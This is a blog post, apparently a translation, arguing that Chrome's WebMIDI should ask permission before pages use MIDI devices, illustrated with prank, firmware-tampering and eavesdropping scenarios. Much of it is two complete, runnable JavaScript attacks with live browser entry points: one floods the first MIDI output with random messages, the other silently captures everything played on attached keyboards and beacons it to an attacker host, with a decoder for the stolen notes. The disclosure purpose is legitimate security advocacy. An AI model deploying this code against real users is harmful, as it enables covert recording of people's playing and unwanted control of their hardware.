Nightmare scenarios with WebMIDI

In the spirit of Halloween... allow me to entertain you with some security and privacy nightmares with the way WebMIDI is implemented in Chrome currently.

The spec says: "The suggested security model explicitly allows user agents to require the user's approval before giving access to MIDI devices, although it is not currently required to prompt the user for this approval"

I think the UA should require approval and below are 3 (+1) scenarios showing how things can go wrong. The overall idea is that using WebMIDI you can read MIDI messages from various devices (so you can think of it as kinda like a microphone) and you can send MIDI messages too, making hardware around the user do something for you (the attacker).

1. Prank

Check out what I did in the previous post:

Demo

This is a demo of using a simple bit of JavaScript to send random MIDI messages to a control surface that happens to be attached to the computer. The user doesn't need to allow the messages to be sent. The attacker doesn't need to fingerprint the device, just enumerate all outputs and send junk to the first one (index [0]).

Imagine you work at a studio that has a similar MIDI control surface. Most studios do. You go to a random page that promises cats. You can almost sense the upcoming entertainment value. Suddenly your control surface starts moving randomly! Even without Yoda in the vocal booth. How freaky is this!

How many planets need to align for this to happen? Some. You need to have a control surface or any other MIDI device plugged into the computer.

Impact? Fairly limited beyond the prank value. Could be irritating to return the controls to where you had them before, but you have backups of the DAW (Digital Audio Workstation) session, right? Right?!
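Here is what that prank script amounts to, as an added example that is not the demo code from the original post. In a browser the entry point at the bottom talks to the real Web MIDI API (navigator.requestMIDIAccess() without the sysex option, which is the call that needed no prompt); fakeMIDIAccess, the device names in the usage note and the seeded PRNG are constructed stand-ins so the same file runs offline in Node with repeatable output.

```javascript
// Added example, not the original post's demo code. In a browser the
// entry point at the bottom talks to the real Web MIDI API; fakeMIDIAccess
// is a constructed stand-in so the file also runs offline in Node.

const NOTE_OFF = 0x80;       // 128
const NOTE_ON = 0x90;        // 144
const CONTROL_CHANGE = 0xB0; // 176: moves faders/knobs on a control surface

// Small seeded LCG so a run is repeatable; a real prank page would use Math.random().
function makeRng(seed) {
  let s = seed >>> 0;
  return () => {
    s = (Math.imul(s, 1664525) + 1013904223) >>> 0;
    return s;
  };
}

// One random 3-byte channel message: status | channel, then two 7-bit data bytes.
function randomMessage(rng) {
  const types = [NOTE_OFF, NOTE_ON, CONTROL_CHANGE];
  const status = types[rng() % types.length] | (rng() % 16);
  return [status, rng() & 0x7f, rng() & 0x7f];
}

// The attack as the post describes it: enumerate outputs, take the first one
// (no fingerprinting), and send it junk. Returns what was sent, for inspection.
function prankFirstOutput(midiAccess, count = 16, rng = makeRng(1)) {
  const outputs = Array.from(midiAccess.outputs.values());
  if (outputs.length === 0) return { target: null, sent: [] };
  const target = outputs[0];
  const sent = [];
  for (let i = 0; i < count; i++) {
    const msg = randomMessage(rng);
    target.send(msg); // MIDIOutput.send(sequence<octet>) queues the bytes immediately
    sent.push(msg);
  }
  return { target: target.name, sent };
}

// Constructed stand-in for a MIDIAccess object: a map of outputs that just log bytes.
function fakeMIDIAccess(outputNames) {
  const outputs = new Map();
  outputNames.forEach((name, i) => {
    outputs.set(`output-${i}`, {
      name,
      log: [],
      send(bytes) { this.log.push(Array.from(bytes)); },
    });
  });
  return { inputs: new Map(), outputs };
}

// Browser entry point. No sysex option, so (in the Chrome the post is about)
// the promise resolves without any user prompt.
function runInBrowser() {
  return navigator.requestMIDIAccess().then((access) =>
    prankFirstOutput(access, 64, makeRng(Date.now())));
}

if (typeof navigator !== 'undefined' && typeof navigator.requestMIDIAccess === 'function') {
  runInBrowser().then((r) => console.log(`sent ${r.sent.length} messages to ${r.target}`));
}
```

Offline, prankFirstOutput(fakeMIDIAccess(['Mackie Control', 'Digital Piano']), 8) sends eight random Note On / Note Off / Control Change messages to the "Mackie Control" entry and nothing to the second device, which is exactly the "grab [0] and blast it" behaviour the post describes; the status bytes always land in 0x80..0xBF and the data bytes stay 7-bit, so a real device will accept them.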

1.1. Prank++

A small variation of this is if the victim has a device capable of making noise. Like a digital piano. Imagine it's dark, past midnight. The victim just managed to put the baby to bed. Quiet, very quiet. The victim decides to relieve a bit of the stress of putting the baby to sleep with some light entertainment that includes cats. Suddenly the keyboard starts playing (way too loud - yup, another lucky MIDI message) the Star Wars theme! Or Wagner's Ride of the Valkyries. TAA-DA, TA-TADADAAA-DA, DAT-DA-DA-DAAAA!

The house is up in arms, the baby cries, the spouse blames. Oh, the pain, the horror!

Bonus scenario - other than baby trouble, the victim's great-grandma just passed away and the victim was thinking of her. Missing her. Hoping she's still around. And her favorite piece was The Ride of the Valkyries... spooooky...

How many planets need to align for this to happen? Some. You need a MIDI device that makes sounds plugged into the computer.

Impact? Fairly limited beyond the prank value. Or is it a heart attack? A special facility for the victim who believes in ghosts of dead people playing the piano?

2. Mess up firmware

The control surface in the video above is a Mackie. Now dig this - the way to install a firmware update to the Mackie hardware is by playing a MIDI file! Whaaa. Yup, look it up. That's amazing. This means you (as a hardware developer) can tell people to come to your page, click a <button> and upgrade their hardware. That's so much simpler than downloading a zip with a MIDI and PDF, reading and following the instructions of how exactly to play the MIDI and how to route stuff in your DAW so it works.

This is great news for hardware devs but also great news for an attacker. Maybe they can install an update you don't want. Maybe they can figure out an update sequence that renders your hardware unusable. Since there's no user consent, nothing can stop them. One cat page and your device stops working...

How many planets need to align for this to happen? Most. You need a MIDI device that takes firmware updates in the form of MIDI messages. And (in the case of the Mackie) the device is restarted in "boot mode" which allows it to accept said messages and act on them. One more caveat: firmware images and bulk dumps are normally carried in System Exclusive messages (0xF0 ... 0xF7), and the spec keeps those behind a separate sysex: true option to requestMIDIAccess(), which Chrome does gate behind a permission prompt. The no-prompt path that makes scenarios 1 and 3 so easy covers ordinary channel messages (notes, control changes); this one additionally needs either an update that works without SysEx or a user who clicks through the SysEx prompt.

Impact? Could be nasty if someone messes up your hardware. Cost to repair, lost income for a studio facility... A competitor running an organized attack against all clients of the vulnerable hardware and making the news that your hardware is unreliable.

3. p0wn Kanye's next hit

K, so the cases above were about sending MIDI messages. Let's wrap up with one where the attacker reads MIDI messages.

You tweet Kanye West a link to an article, which talks about how great he is (in addition to all the cats, naturally). He loads your page, you give him cats and a long "Loading..." animation. He wants to read how great he is but gets bored waiting. He reaches for the nearest keyboard and starts playing the upcoming hit melody he's been working so hard to perfect. The keyboard is connected to the computer and it starts sending your cat page MIDI messages. You listen (new Image().src = 'attack.com?midi=[144,123,12][128,12,14]...) to the melody, record it and put it up on Spotify later that night. Kanye still waits for the page to load while you laugh all the way to the bank to cash the royalties from the hit. Or, because you ain't got no fans and your version of the song is awful, it's not a hit. You make 0 money. So you wait for Kanye's version to explode and then sue him because he blatantly stole from your song released weeks ago.

Because there's no user approval, nowhere in the process was Kanye aware that his keyboard was bugged. By a web page!
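The bugged-keyboard scenario, end to end, as an added example that is not code from the original post. The victim half subscribes to every MIDI input and exfiltrates what gets played through an image request, in the same "[144,123,12]" byte format the post's URL sketches; the attacker half is what the receiving server does with the query string to get a melody back. fakeInput, the five-note phrase in demo() and the host attack.example are constructed so the file runs offline in Node.

```javascript
// Added example, not code from the original post. The victim half wires up
// every MIDI input and exfiltrates what is played via an image request, as
// the post sketches; the attacker half turns the query string back into
// notes. fakeInput, the phrase in demo() and attack.example are constructed.

const NOTE_NAMES = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B'];

// Serialise one message's bytes the way the post's URL shows them: "[144,123,12]".
function encodeMessage(data) {
  return '[' + Array.from(data).join(',') + ']';
}

// Victim side. Subscribes to every input (no prompt needed for non-SysEx access
// in the Chrome of the post), batches messages, and hands each batch to `beacon`.
// Returns a flush function so the tail can be sent on pagehide.
function bugKeyboard(midiAccess, beacon, batchSize = 8) {
  let pending = [];
  const flush = () => {
    if (pending.length === 0) return;
    beacon('https://attack.example/?midi=' + encodeURIComponent(pending.join('')));
    pending = [];
  };
  for (const input of midiAccess.inputs.values()) {
    input.onmidimessage = (ev) => {
      pending.push(encodeMessage(ev.data));
      if (pending.length >= batchSize) flush();
    };
  }
  return flush;
}

// Attacker side: parse "[144,60,100][128,60,0]..." from a beacon URL and keep the
// Note On events (status 0x9n with non-zero velocity) as note names like "C4".
function decodeMelody(url) {
  const query = url.slice(url.indexOf('?'));
  const raw = new URLSearchParams(query).get('midi') || '';
  const notes = [];
  for (const m of raw.matchAll(/\[(\d+),(\d+),(\d+)\]/g)) {
    const [status, note, velocity] = m.slice(1).map(Number);
    if ((status & 0xF0) === 0x90 && velocity > 0) {
      notes.push(NOTE_NAMES[note % 12] + (Math.floor(note / 12) - 1));
    }
  }
  return notes;
}

// Constructed stand-in for a MIDIAccess with one input we can "play" into.
function fakeInput(name) {
  const input = {
    name,
    onmidimessage: null,
    play(bytes) {
      if (this.onmidimessage) this.onmidimessage({ data: Uint8Array.from(bytes) });
    },
  };
  return { inputs: new Map([[name, input]]), outputs: new Map(), input };
}

// Offline demo: play a constructed five-note phrase and recover it from the beacons.
function demo() {
  const access = fakeInput('Stage Piano');
  const urls = [];
  const flush = bugKeyboard(access, (url) => urls.push(url), 4);
  for (const note of [60, 62, 64, 65, 67]) { // C4 D4 E4 F4 G4
    access.input.play([0x90, note, 100]);
    access.input.play([0x80, note, 0]);
  }
  flush();
  return { beacons: urls.length, melody: urls.flatMap(decodeMelody) };
}

// Browser entry point: same wiring, with a real image beacon.
function runInBrowser() {
  return navigator.requestMIDIAccess().then((access) => {
    const flush = bugKeyboard(access, (url) => { new Image().src = url; });
    window.addEventListener('pagehide', flush);
  });
}

if (typeof navigator !== 'undefined' && typeof navigator.requestMIDIAccess === 'function') {
  runInBrowser();
}
```

The image beacon is the point of the post's one-liner: a GET for an image needs no CORS headers, no fetch permission and no visible UI, and it still fires while the victim is staring at the fake "Loading..." animation. Running demo() offline yields three beacons for ten messages (two full batches of four plus the flushed tail) and decodes them back to C4 D4 E4 F4 G4; feeding the post's own "[144,123,12][128,12,14]" through decodeMelody gives a single Note On, D#9, and the Note Off is dropped.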

How many planets need to align for this to happen? Not that many. You need one Kanye playing and one keyboard attached to the computer.

Impact? Stealing intellectual property at worst, privacy snooping at best.

Yeah...

I hate clicking on permission prompts as much as the next person, but I think in this case we need one (to send MIDI messages and another one to receive 'em). Thanks for reading!

Translated from: https://www.phpied.com/nightmare-scenarios-with-webmidi/